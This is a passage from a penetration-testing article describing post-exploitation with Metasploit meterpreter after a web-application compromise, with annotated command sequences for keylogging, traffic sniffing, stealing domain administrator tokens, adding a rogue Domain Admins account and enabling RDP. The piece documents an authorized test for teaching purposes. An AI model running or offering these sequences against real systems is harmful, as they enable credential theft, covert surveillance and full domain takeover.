
Useful commands – meterpreter

Meterpreter has several useful extensions and commands, one of them being the ‘ps’ command, which lists all processes running on the target system.

meterpreter > ps

Figure 2 is a listing of all the processes on the target operating system, retrieved through the meterpreter shell.

Once you have the process list, you can migrate meterpreter into a different process (the migrate command injects the meterpreter DLL into that process). In Figure 2, you can see that we migrated into the explorer.exe process and started a keystroke sniffer on the target system. The keystroke hook only sees the desktop session of the process meterpreter is running in, which is why migrating into explorer.exe, the logged-on user’s shell, comes first. Figure 3 shows the keystroke logger being started with keyscan_start; the captured keystrokes are pulled back to the attacker’s system with keyscan_dump.

We also ran a sniffer to capture traffic to and from the target system. It is initialised with the use sniffer command, followed by sniffer_interfaces, which lists the capture-capable interfaces on the target system, followed by sniffer_start <interface number> <packet buffer size>.

Figure 4 shows us dumping the sniffer results captured on the target system into a cap file with the sniffer_dump command, for analysis on the attacker’s machine. Perhaps the most useful command, and the one that gave us comprehensive access to the inside network, was the incognito extension in meterpreter.
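Putting the process, keystroke and sniffer commands above together, here is an annotated meterpreter command sequence. This is an added example, not the article’s own session transcript: the PID, interface number and dump path are placeholders to be replaced with what ps and sniffer_interfaces report on your target, and the lines beginning with # are annotations, not console input.

```text
# Added example (not the article's figures): annotated meterpreter commands for
# process migration, keystroke capture and packet sniffing.
# Lines starting with # are annotations, not console input.
ps                              # list processes; note the PID of explorer.exe
migrate 1234                    # 1234 is a placeholder for the explorer.exe PID from ps
getpid                          # confirm meterpreter now lives in the new process
keyscan_start                   # hook keystrokes on the desktop of the current process
keyscan_dump                    # pull the buffered keystrokes back to the attacker console
keyscan_stop                    # unhook when finished
use sniffer                     # load the sniffer extension ("load sniffer" is the newer form)
sniffer_interfaces              # enumerate interfaces that can be captured on
sniffer_start 1 200000          # interface 1 (placeholder), buffer up to 200000 packets in memory
sniffer_stats 1                 # packets and bytes buffered so far
sniffer_dump 1 /tmp/target.cap  # write the buffer as a pcap on the attacker's side (path is a placeholder)
sniffer_stop 1                  # stop capturing and release the buffer
```

The migration matters for keyscan: the hook only sees the desktop of the process meterpreter is running in, so explorer.exe yields the logged-on user’s keystrokes, while winlogon.exe would catch logon credentials. The sniffer keeps its buffer in memory on the target and writes nothing to the target’s disk; only sniffer_dump writes the capture, and it does so on the attacker’s machine.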

The incognito extension in meterpreter allows you to impersonate other users’ access tokens on the compromised system and, through them, act as those users on the network.

Windows represents the security context of each logged-on user as an access token, which the system consults for authentication and authorization decisions when that user accesses local or network resources. These tokens are not unlike web cookies: they spare Windows users from constantly re-authenticating to gain access to network or system resources [4]. SYSTEM is the highest-privileged token available on a target machine.

Our first task was to identify whether any tokens were present that could be stolen to take us deeper into the organization [5]. We ran the command use incognito to load the module and its commands, then listed the available delegation tokens that we could potentially steal (delegation tokens can be used for network access, impersonation tokens only for local actions).

Figure 5 shows the tokens available on the target machine, among which was the Administrator’s token on the company’s domain; this is the token we stole.

Once we held the domain administrator’s token, we were effectively the administrator of the domain, and the domain was our next target.

The incognito module has an add_user option that lets the tester add a user name and password to the domain (the -h option points it at the domain controller) and, given the right credentials, an add_group_user option that adds that user to a domain group such as Domain Admins. Therefore, we didn’t resist: we added user we45 with password ‘we45’ to the domain and then added we45 to the Domain Admins group.

Figure 6 displays the incognito commands used to add user we45 to both the domain and the Domain Admins group.
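The incognito sequence, from loading the extension to the Domain Admins addition, as an added example rather than the article’s figures. The domain name CORP and the domain controller address 10.0.0.5 are assumed placeholders; we45/we45 is the account the article created, and lines beginning with # are annotations.

```text
# Added example (not the article's transcript): token enumeration, impersonation and
# account creation with incognito. CORP and 10.0.0.5 are a placeholder domain name
# and domain controller address; we45/we45 is the account the article created.
getuid                                  # the full token list needs NT AUTHORITY\SYSTEM
getsystem                               # escalate first if getuid reports anything else
use incognito                           # load the extension ("load incognito" is the newer form)
list_tokens -u                          # list tokens by user (-g lists them by group)
# "Delegation Tokens Available" can be used for network access, e.g. against the DC;
# "Impersonation Tokens Available" are only good for actions on the local host.
impersonate_token CORP\\Administrator   # the doubled backslash is required at the meterpreter prompt
getuid                                  # should now report Server username: CORP\Administrator
add_user we45 we45 -h 10.0.0.5          # create the domain account on the DC
add_group_user "Domain Admins" we45 -h 10.0.0.5   # add it to the Domain Admins global group
rev2self                                # drop the impersonated token when finished
```

If the Administrator token appears only under impersonation tokens, the add_user and add_group_user calls against the domain controller will fail with access denied; a delegation token, typically left behind by an interactive or RDP logon of that user, is what makes the network hop possible.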

Figure 2. Process listing using the meterpreter shell

Figure 3. keyscan_start in meterpreter on the target system

Figure 4. Sniffer dump from the target system into a cap file

Figure 6. Adding users to domain and Domain Admins group

Figure 5. List of tokens available for impersonation

EXPLOITING WITH METASPLOIT

Now we had the ability to control the entire internal infrastructure from outside the environment.

However, not having GUI access was a little inconvenient. We wanted to gain access via Remote Desktop Protocol (RDP) to the web application server and, from there, open an RDP session into the domain server, from which we could control the organization’s entire domain.

Meterpreter has a script to enable RDP on the target system, getgui (in current Metasploit versions it has been superseded by the post/windows/manage/enable_rdp module). Therefore, we ran the following command:

run getgui -u we45 -p we45

This command created a local account and gave us RDP access to the target system, after which we opened another Remote Desktop session to the domain server to examine our proverbial ‘spoils of war’. Figures 7 and 8 are images of our RDP session into the domain server.

From then on, it was only a matter of time before we had complete access to the design information on the internal network. We exfiltrated a small sample of that information as evidence that we had been able to reach it, ran cleanup scripts to ensure that the servers were not left in a weakened state after our analysis, and immediately called the client’s emergency contact to warn him to remove all the shellcode executables, and the user we had created, from the domain server [6].
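The RDP step and the cleanup that follows it, as an added example (not the article’s own script or figures). The switches are getgui’s documented -u, -p and -e options; the cleanup uses Windows net commands from a command shell spawned under the impersonated domain admin token, and the account name is the one the article used. Lines beginning with # are annotations.

```text
# Added example (not the article's script or figures): enabling RDP with getgui
# and removing the artefacts afterwards. Account names are the article's.
run getgui -u we45 -p we45       # creates local user we45, adds it to Remote Desktop Users
                                 # and Administrators, enables RDP and opens the firewall port
run getgui -e                    # alternative: enable RDP only, without creating a user
# getgui prints the path of a clean_up resource script it saves on the attacker's
# machine; keep it, it undoes the local user and the RDP changes later:
#   run multi_console_command -rc <path printed by getgui>
# Newer Metasploit versions replace the script with a post module:
run post/windows/manage/enable_rdp USERNAME=we45 PASSWORD=we45

# Cleanup of the domain account once the RDP work is done. -t makes cmd.exe run
# under the currently impersonated token, so the /domain operations succeed:
execute -f cmd.exe -i -H -t
net group "Domain Admins" we45 /delete /domain
net user we45 /delete /domain
exit
rev2self                         # drop the impersonated token
```

Run the domain cleanup while the stolen token is still impersonated; after rev2self the meterpreter session is back to its original identity and the net commands against the domain controller will be refused.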

We had been able to execute an internal attack through a vulnerable web application. When we revealed our findings to management, they were quite alarmed that we had been able to comprehensively breach their internal network simply by gaining access to their web application.

Conclusion

The above article highlights some techniques that testers can use when compromising internal networks from outside the network. However, while any tester feels an immense urge to skip steps and move directly into exploitation, it is the patient and meticulous testers that get the best results. A consistent and repeatable methodology is an absolute essential for a pen-tester. A tester who follows the methodology and is skilled at analyzing and interpreting a given situation will put tools to the best use.

Another important lesson my own team took from this test was that gaining root on a box is the beginning of a test, not its end or sole objective. Attackers are constantly looking to create deeper levels of access into an organization’s infrastructure. We, as pentesters, must apply the same level of drive and determination to reach a data-oriented goal (in this case, design information).

ABHAY BHARGAV

Abhay Bhargav is the CTO of we45 Solutions India Pvt. Ltd, a focused Information Security Company (www.we45.com). we45 provides security consulting, testing and training services and handles Vulnerability Assessment and Penetration Testing projects for Infrastructure and Apps of Fortune 1000 companies. He can be reached at [email protected], on Twitter at @abhaybhargav and on LinkedIn at http://in.linkedin.com/in/abhay-bhargav. He is the co-author of ‘’Secure Java for Web Application Development’’ and is currently authoring ‘’PCI Compliance – A Definitive Guide’’.

Figure 7. RDP access to the domain server

Figure 8. Access to the Active Directory Users in the Domain Server

